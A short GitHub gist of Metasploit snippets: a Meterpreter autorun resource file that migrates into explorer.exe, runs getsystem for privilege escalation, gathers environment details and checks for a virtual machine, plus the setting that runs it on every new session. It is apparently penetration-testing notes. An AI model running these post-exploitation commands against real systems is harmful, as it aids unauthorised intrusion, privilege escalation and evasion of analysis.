Skip to content

Instantly share code, notes, and snippets.

@sckalath
Created November 7, 2014 03:05
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
  • Save sckalath/358625fe37d8612508ab to your computer and use it in GitHub Desktop.
Save sckalath/358625fe37d8612508ab to your computer and use it in GitHub Desktop.
Metasploit snippets
#autorun script (session.rc)
migrate -k -n explorer.exe
multi_console_command -cl "getsystem","getuid"
get_env
checkvm
#setting msf to use autorunscript above
set autorunscript multiscript.rb -rc /home/ryan/session.rc
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment